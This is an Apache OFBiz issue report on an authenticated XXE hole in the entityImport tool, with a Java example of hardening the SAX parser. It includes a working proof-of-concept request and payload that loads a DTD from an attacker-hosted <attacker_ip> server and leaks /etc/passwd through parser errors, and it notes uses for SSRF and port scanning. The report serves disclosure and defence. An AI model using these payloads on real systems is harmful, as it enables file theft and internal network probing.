OFBiz / OFBIZ-1525 Issue to group security concerns / OFBIZ-11195

XML Entity Injection in webtools/control/entityImport


Details

    • Bug Crush Event - 21/2/2015

    Description

      This was reported to the OFBiz security team by Jason Nordenstam from offensive-security.com. We did not consider it a real security issue because it requires authentication.

      Authenticated users can import XML documents containing DTDs. The SAX parser used by the XML Data Import functionality does not have DTD parsing explicitly disabled, which makes it vulnerable to XXE attacks.

      The results of the import are not displayed in the page, so an 'error-based' approach is needed to read local files: the file contents are leaked through the parser's error message rather than through the response body. The parser will also resolve external entities, so this vulnerability can also be used for internal port scanning or server-side request forgery.
      Affected URL:
      /webtools/control/entityImport

      POC Example Request:
      POST /webtools/control/entityImport HTTP/1.1
      Host: <host>
      User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Language: en-US,en;q=0.5
      Accept-Encoding: gzip, deflate
      Referer: <host>/webtools/control/entityImport
      Content-Type: application/x-www-form-urlencoded
      Content-Length: 312
      Cookie: JSESSIONID=66A4289C95C78E5E7977EFF796A7D05B.jvm1; OFBiz.Visitor=10178
      Connection: close
      Upgrade-Insecure-Requests: 1

      fulltext=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22utf-8%22%3F%3E%0D%0A%3C%21DOCTYPE+notfound+%5B%0D%0A+%3C%21ENTITY+%25+base+SYSTEM+%22http%3A%2F%2F<attacker_ip>%2Ferror.dtd%22%3E%0D%0A+%25base%3B%0D%0A+%25param1%3B+%0D%0A+%25external%3B%0D%0A%5D%3E%0D%0A%3Croot%3E%3Cfoo%3Ebar%3C%2Fbar%3E%3C%2Froot%3E%0D%0A

      Payload One Decoded:
      <?xml version="1.0" encoding="utf-8"?>
      <!DOCTYPE notfound [
      <!ENTITY % base SYSTEM "http://<attacker_ip>/error.dtd">
      %base;
      %param1;
      %external;
      ]>
      <root><foo>bar</bar></root>

      error.dtd on Attacking Machine:
      <!ENTITY % payload SYSTEM "file:///etc/passwd">
      <!ENTITY % param1 "<!ENTITY % external SYSTEM 'file:///banana/%payload;'>" >
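
      The root cause described above is a SAX parser that still honours DOCTYPEs and resolves external entities. The following Java program is an added example, not code from OFBiz or from the original report: it puts a default SAXParserFactory beside one configured the way the XML Data Import parser should be, and feeds both a constructed payload whose SYSTEM entity points at a temporary file the program writes itself (a stand-in for /etc/passwd, so the demo runs offline). The class name XxeDemo, the helper names and the sample file content are assumptions made for the example.

```java
import java.io.StringReader;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.Path;

import javax.xml.XMLConstants;
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;

import org.xml.sax.InputSource;
import org.xml.sax.SAXParseException;
import org.xml.sax.helpers.DefaultHandler;

// Added example (not OFBiz code): default vs. hardened SAX parser configuration.
public class XxeDemo {

    // Factory as many Java code bases create it: DOCTYPEs, external general
    // entities and external parameter entities are all honoured by default.
    static SAXParserFactory unsafeFactory() {
        return SAXParserFactory.newInstance();
    }

    // Hardened factory: rejecting any DOCTYPE is enough on its own to defeat the
    // PoC (no internal subset means %base; never loads error.dtd). The remaining
    // features are defence in depth for code paths that must accept a DTD.
    static SAXParserFactory hardenedFactory() throws Exception {
        SAXParserFactory f = SAXParserFactory.newInstance();
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        f.setXIncludeAware(false);
        return f;
    }

    // Parse the document and return its concatenated character data, which is
    // where an expanded external entity ends up.
    static String parseText(SAXParserFactory factory, String xml) throws Exception {
        SAXParser parser = factory.newSAXParser();
        StringBuilder text = new StringBuilder();
        parser.parse(new InputSource(new StringReader(xml)), new DefaultHandler() {
            @Override
            public void characters(char[] ch, int start, int length) {
                text.append(ch, start, length);
            }
        });
        return text.toString();
    }

    public static void main(String[] args) throws Exception {
        // Constructed stand-in for /etc/passwd so the demo needs no real system file.
        Path secret = Files.createTempFile("secret", ".txt");
        Files.write(secret, "root:x:0:0:root:/root:/bin/bash".getBytes(StandardCharsets.UTF_8));

        // Constructed payload: a general entity whose SYSTEM id is the temp file.
        String payload = "<?xml version=\"1.0\"?>\n"
                + "<!DOCTYPE root [\n"
                + "  <!ENTITY xxe SYSTEM \"" + secret.toUri() + "\">\n"
                + "]>\n"
                + "<root>&xxe;</root>";

        System.out.println("default parser read: " + parseText(unsafeFactory(), payload));

        try {
            parseText(hardenedFactory(), payload);
            System.out.println("hardened parser: unexpectedly accepted the DOCTYPE");
        } catch (SAXParseException e) {
            System.out.println("hardened parser rejected the document: " + e.getMessage());
        }
    }
}
```

      With the default factory the file contents are returned as the document's character data, i.e. the classic in-band XXE read. With the hardened factory the parser stops at the DOCTYPE before any entity is declared, so neither the in-band read nor the out-of-band parameter-entity chain of the PoC (%base; fetching error.dtd, %param1; defining the file-backed entity, %external; triggering the error) can start. For an import endpoint that never legitimately needs a DTD, disallow-doctype-decl is the setting to apply; the entity and external-DTD features matter for parsers that must still accept one.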

      We have reproduced it at https://demo-stable.ofbiz.apache.org/webtools/control/entityImport
      using:

      <?xml version="1.0" encoding="utf-8"?>
      <!DOCTYPE notfound [
      <!ENTITY % base SYSTEM "https://demo-trunk.ofbiz.apache.org/images/error.dtd">
      %base;
      %param1;
      %external;
      ]>
      <root><foo>bar</bar></root>


      People: jleroux Jacques Le Roux